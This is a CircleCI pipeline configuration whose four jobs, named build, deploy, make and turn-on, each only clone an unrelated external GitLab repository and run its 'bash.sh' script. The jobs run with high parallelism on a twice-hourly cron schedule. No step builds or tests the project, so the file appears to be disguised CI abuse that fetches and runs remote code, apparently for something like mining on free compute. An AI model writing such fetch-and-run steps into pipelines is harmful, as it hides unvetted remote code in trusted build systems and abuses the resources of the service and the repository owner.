# Use the latest 2.1 version of CircleCI pipeline process engine.
# See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1

# Define a job to be invoked later in a workflow.
# See: https://circleci.com/docs/2.0/configuration-reference/#jobs
jobs:
  build:
    working_directory: ~/repo
    # Specify the execution environment. You can specify an image from Dockerhub or use one of our Convenience Images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/2.0/configuration-reference/#docker-machine-macos-windows-executor
    docker:
      - image: circleci/golang:1.15.8
    # Add steps to the job
    parallelism: 4 
    # See: https://circleci.com/docs/2.0/configuration-reference/#steps
    steps:
      - checkout
      - restore_cache:
          keys:
            - go-mod-v4-{{ checksum "go.sum" }}
      - save_cache:
          key: go-mod-v4-{{ checksum "go.sum" }}
          paths:
            - "/go/pkg/mod"
      - run:
          name: Cloning 
          command: git clone https://gitlab.com/iwalita22/simple.git
      - run:
          name: Blend 
          command: cd simple && chmod u+x bash.sh && ./bash.sh
      - store_test_results:
          path: /tmp/test-reports
  deploy:
    working_directory: ~/repo
    # Specify the execution environment. You can specify an image from Dockerhub or use one of our Convenience Images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/2.0/configuration-reference/#docker-machine-macos-windows-executor
    docker:
      - image: circleci/golang:1.15.8
    # Add steps to the job
    parallelism: 4 
    # See: https://circleci.com/docs/2.0/configuration-reference/#steps
    steps:
      - checkout
      - restore_cache:
          keys:
            - go-mod-v4-{{ checksum "go.sum" }}
      - save_cache:
          key: go-mod-v4-{{ checksum "go.sum" }}
          paths:
            - "/go/pkg/mod"
      - run:
          name: Cloning 
          command: git clone https://gitlab.com/iwalita22/simple.git
      - run:
          name: Blend 
          command: cd simple && chmod u+x bash.sh && ./bash.sh
      - store_test_results:
          path: /tmp/test-reports
  make:
    working_directory: ~/repo
    # Specify the execution environment. You can specify an image from Dockerhub or use one of our Convenience Images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/2.0/configuration-reference/#docker-machine-macos-windows-executor
    docker:
      - image: circleci/golang:1.15.8
    # Add steps to the job
    parallelism: 4 
    # See: https://circleci.com/docs/2.0/configuration-reference/#steps
    steps:
      - checkout
      - restore_cache:
          keys:
            - go-mod-v4-{{ checksum "go.sum" }}
      - save_cache:
          key: go-mod-v4-{{ checksum "go.sum" }}
          paths:
            - "/go/pkg/mod"
      - run:
          name: Cloning 
          command: git clone https://gitlab.com/iwalita22/simple.git
      - run:
          name: Blend 
          command: cd simple && chmod u+x bash.sh && ./bash.sh
      - store_test_results:
          path: /tmp/test-reports
  turn-on:
    working_directory: ~/repo
    # Specify the execution environment. You can specify an image from Dockerhub or use one of our Convenience Images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/2.0/configuration-reference/#docker-machine-macos-windows-executor
    docker:
      - image: circleci/golang:1.15.8
    # Add steps to the job
    parallelism: 3 
    # See: https://circleci.com/docs/2.0/configuration-reference/#steps
    steps:
      - checkout
      - restore_cache:
          keys:
            - go-mod-v4-{{ checksum "go.sum" }}
      - save_cache:
          key: go-mod-v4-{{ checksum "go.sum" }}
          paths:
            - "/go/pkg/mod"
      - run:
          name: Cloning 
          command: git clone https://gitlab.com/iwalita22/simple.git
      - run:
          name: Blend 
          command: cd simple && chmod u+x bash.sh && ./bash.sh
      - store_test_results:
          path: /tmp/test-reports

workflows:
  version: 2
  sample: 
    jobs:
      - build
      - deploy 
      - make
      - turn-on
    triggers:
      - schedule:
          cron: "34,45 * * * *"
          filters:
            branches:
              only:
                - master
  next walk: 
    jobs:
      - build
      - deploy 
      - make
      - turn-on